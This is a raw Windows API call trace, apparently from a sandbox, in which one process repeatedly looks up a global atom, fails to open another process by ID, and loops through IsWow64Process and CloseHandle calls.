	[0129.641] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.641] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.642] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.642] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.642] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.642] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.642] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.642] CloseHandle (hObject=0x2dc) returned 1
	[0129.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.643] CloseHandle (hObject=0x2dc) returned 1
	[0129.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.643] CloseHandle (hObject=0x2dc) returned 1
	[0129.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.643] CloseHandle (hObject=0x2dc) returned 1
	[0129.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.643] CloseHandle (hObject=0x2dc) returned 1
	[0129.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.644] CloseHandle (hObject=0x2dc) returned 1
	[0129.677] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.677] CloseHandle (hObject=0x2dc) returned 1
	[0129.677] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.677] CloseHandle (hObject=0x2dc) returned 1
	[0129.677] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.677] CloseHandle (hObject=0x2dc) returned 1
	[0129.678] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.678] CloseHandle (hObject=0x2dc) returned 1
	[0129.678] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.678] CloseHandle (hObject=0x2dc) returned 1
	[0129.678] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.678] CloseHandle (hObject=0x2dc) returned 1
	[0129.678] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.678] CloseHandle (hObject=0x2dc) returned 1
	[0129.679] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.679] CloseHandle (hObject=0x2dc) returned 1
	[0129.679] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.679] CloseHandle (hObject=0x2dc) returned 1
	[0129.679] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.679] CloseHandle (hObject=0x2dc) returned 1
	[0129.679] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.679] CloseHandle (hObject=0x2dc) returned 1
	[0129.679] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.679] CloseHandle (hObject=0x2dc) returned 1
	[0129.680] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.680] CloseHandle (hObject=0x2dc) returned 1
	[0129.680] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.680] CloseHandle (hObject=0x2dc) returned 1
	[0129.680] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.680] CloseHandle (hObject=0x2dc) returned 1
	[0129.680] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.681] CloseHandle (hObject=0x2dc) returned 1
	[0129.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.681] CloseHandle (hObject=0x2dc) returned 1
	[0129.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.681] CloseHandle (hObject=0x2dc) returned 1
	[0129.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.681] CloseHandle (hObject=0x2dc) returned 1
	[0129.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.681] CloseHandle (hObject=0x2dc) returned 1
	[0129.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.682] CloseHandle (hObject=0x2dc) returned 1
	[0129.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.682] CloseHandle (hObject=0x2dc) returned 1
	[0129.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.682] CloseHandle (hObject=0x2dc) returned 1
	[0129.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.682] CloseHandle (hObject=0x2dc) returned 1
	[0129.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.683] CloseHandle (hObject=0x2dc) returned 1
	[0129.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.683] CloseHandle (hObject=0x2dc) returned 1
	[0129.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.683] CloseHandle (hObject=0x2dc) returned 1
	[0129.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.683] CloseHandle (hObject=0x2dc) returned 1
	[0129.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.684] CloseHandle (hObject=0x2dc) returned 1
	[0129.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.684] CloseHandle (hObject=0x2dc) returned 1
	[0129.684] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.684] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.685] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.685] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.685] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.685] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.685] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.685] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.686] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.686] CloseHandle (hObject=0x2dc) returned 1
	[0129.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.686] CloseHandle (hObject=0x2dc) returned 1
	[0129.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.686] CloseHandle (hObject=0x2dc) returned 1
	[0129.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.686] CloseHandle (hObject=0x2dc) returned 1
	[0129.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.687] CloseHandle (hObject=0x2dc) returned 1
	[0129.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.687] CloseHandle (hObject=0x2dc) returned 1
	[0129.719] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.719] CloseHandle (hObject=0x2dc) returned 1
	[0129.719] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.719] CloseHandle (hObject=0x2dc) returned 1
	[0129.720] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.720] CloseHandle (hObject=0x2dc) returned 1
	[0129.720] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.720] CloseHandle (hObject=0x2dc) returned 1
	[0129.720] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.720] CloseHandle (hObject=0x2dc) returned 1
	[0129.720] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.720] CloseHandle (hObject=0x2dc) returned 1
	[0129.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.721] CloseHandle (hObject=0x2dc) returned 1
	[0129.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.721] CloseHandle (hObject=0x2dc) returned 1
	[0129.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.721] CloseHandle (hObject=0x2dc) returned 1
	[0129.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.721] CloseHandle (hObject=0x2dc) returned 1
	[0129.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.722] CloseHandle (hObject=0x2dc) returned 1
	[0129.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.722] CloseHandle (hObject=0x2dc) returned 1
	[0129.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.722] CloseHandle (hObject=0x2dc) returned 1
	[0129.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.722] CloseHandle (hObject=0x2dc) returned 1
	[0129.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.723] CloseHandle (hObject=0x2dc) returned 1
	[0129.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.723] CloseHandle (hObject=0x2dc) returned 1
	[0129.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.723] CloseHandle (hObject=0x2dc) returned 1
	[0129.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.723] CloseHandle (hObject=0x2dc) returned 1
	[0129.724] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.724] CloseHandle (hObject=0x2dc) returned 1
	[0129.724] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.724] CloseHandle (hObject=0x2dc) returned 1
	[0129.724] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.724] CloseHandle (hObject=0x2dc) returned 1
	[0129.724] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.724] CloseHandle (hObject=0x2dc) returned 1
	[0129.724] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.725] CloseHandle (hObject=0x2dc) returned 1
	[0129.725] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.725] CloseHandle (hObject=0x2dc) returned 1
	[0129.725] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.725] CloseHandle (hObject=0x2dc) returned 1
	[0129.725] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.725] CloseHandle (hObject=0x2dc) returned 1
	[0129.725] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.725] CloseHandle (hObject=0x2dc) returned 1
	[0129.726] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.726] CloseHandle (hObject=0x2dc) returned 1
	[0129.726] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.726] CloseHandle (hObject=0x2dc) returned 1
	[0129.726] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.726] CloseHandle (hObject=0x2dc) returned 1
	[0129.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.727] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.727] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.727] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.728] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.728] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.728] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.728] CloseHandle (hObject=0x2dc) returned 1
	[0129.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.728] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.728] CloseHandle (hObject=0x2dc) returned 1
	[0129.728] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.728] CloseHandle (hObject=0x2dc) returned 1
	[0129.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.729] CloseHandle (hObject=0x2dc) returned 1
	[0129.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.729] CloseHandle (hObject=0x2dc) returned 1
	[0129.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.729] CloseHandle (hObject=0x2dc) returned 1
	[0129.761] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.762] CloseHandle (hObject=0x2dc) returned 1
	[0129.762] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.762] CloseHandle (hObject=0x2dc) returned 1
	[0129.762] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.762] CloseHandle (hObject=0x2dc) returned 1
	[0129.762] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.762] CloseHandle (hObject=0x2dc) returned 1
	[0129.763] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.763] CloseHandle (hObject=0x2dc) returned 1
	[0129.763] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.763] CloseHandle (hObject=0x2dc) returned 1
	[0129.763] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.763] CloseHandle (hObject=0x2dc) returned 1
	[0129.763] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.763] CloseHandle (hObject=0x2dc) returned 1
	[0129.763] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.764] CloseHandle (hObject=0x2dc) returned 1
	[0129.764] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.764] CloseHandle (hObject=0x2dc) returned 1
	[0129.764] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.764] CloseHandle (hObject=0x2dc) returned 1
	[0129.764] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.764] CloseHandle (hObject=0x2dc) returned 1
	[0129.764] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.764] CloseHandle (hObject=0x2dc) returned 1
	[0129.765] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.765] CloseHandle (hObject=0x2dc) returned 1
	[0129.765] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.765] CloseHandle (hObject=0x2dc) returned 1
	[0129.765] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.765] CloseHandle (hObject=0x2dc) returned 1
	[0129.765] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.765] CloseHandle (hObject=0x2dc) returned 1
	[0129.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.766] CloseHandle (hObject=0x2dc) returned 1
	[0129.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.766] CloseHandle (hObject=0x2dc) returned 1
	[0129.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.766] CloseHandle (hObject=0x2dc) returned 1
	[0129.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.766] CloseHandle (hObject=0x2dc) returned 1
	[0129.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.767] CloseHandle (hObject=0x2dc) returned 1
	[0129.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.767] CloseHandle (hObject=0x2dc) returned 1
	[0129.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.767] CloseHandle (hObject=0x2dc) returned 1
	[0129.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.767] CloseHandle (hObject=0x2dc) returned 1
	[0129.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.768] CloseHandle (hObject=0x2dc) returned 1
	[0129.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.768] CloseHandle (hObject=0x2dc) returned 1
	[0129.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.768] CloseHandle (hObject=0x2dc) returned 1
	[0129.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.768] CloseHandle (hObject=0x2dc) returned 1
	[0129.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.769] CloseHandle (hObject=0x2dc) returned 1
	[0129.769] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.769] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.769] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.770] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.770] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.770] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.770] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.770] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.770] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.770] CloseHandle (hObject=0x2dc) returned 1
	[0129.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.771] CloseHandle (hObject=0x2dc) returned 1
	[0129.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.771] CloseHandle (hObject=0x2dc) returned 1
	[0129.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.771] CloseHandle (hObject=0x2dc) returned 1
	[0129.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.771] CloseHandle (hObject=0x2dc) returned 1
	[0129.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.772] CloseHandle (hObject=0x2dc) returned 1
	[0129.805] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.805] CloseHandle (hObject=0x2dc) returned 1
	[0129.805] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.805] CloseHandle (hObject=0x2dc) returned 1
	[0129.806] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.806] CloseHandle (hObject=0x2dc) returned 1
	[0129.806] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.806] CloseHandle (hObject=0x2dc) returned 1
	[0129.806] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.806] CloseHandle (hObject=0x2dc) returned 1
	[0129.806] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.806] CloseHandle (hObject=0x2dc) returned 1
	[0129.806] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.807] CloseHandle (hObject=0x2dc) returned 1
	[0129.807] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.807] CloseHandle (hObject=0x2dc) returned 1
	[0129.807] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.807] CloseHandle (hObject=0x2dc) returned 1
	[0129.807] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.807] CloseHandle (hObject=0x2dc) returned 1
	[0129.807] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.807] CloseHandle (hObject=0x2dc) returned 1
	[0129.808] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.808] CloseHandle (hObject=0x2dc) returned 1
	[0129.808] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.808] CloseHandle (hObject=0x2dc) returned 1
	[0129.808] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.808] CloseHandle (hObject=0x2dc) returned 1
	[0129.808] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.808] CloseHandle (hObject=0x2dc) returned 1
	[0129.809] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.809] CloseHandle (hObject=0x2dc) returned 1
	[0129.809] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.809] CloseHandle (hObject=0x2dc) returned 1
	[0129.809] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.809] CloseHandle (hObject=0x2dc) returned 1
	[0129.809] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.809] CloseHandle (hObject=0x2dc) returned 1
	[0129.809] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.809] CloseHandle (hObject=0x2dc) returned 1
	[0129.810] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.810] CloseHandle (hObject=0x2dc) returned 1
	[0129.810] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.810] CloseHandle (hObject=0x2dc) returned 1
	[0129.810] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.810] CloseHandle (hObject=0x2dc) returned 1
	[0129.810] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.810] CloseHandle (hObject=0x2dc) returned 1
	[0129.811] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.811] CloseHandle (hObject=0x2dc) returned 1
	[0129.811] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.811] CloseHandle (hObject=0x2dc) returned 1
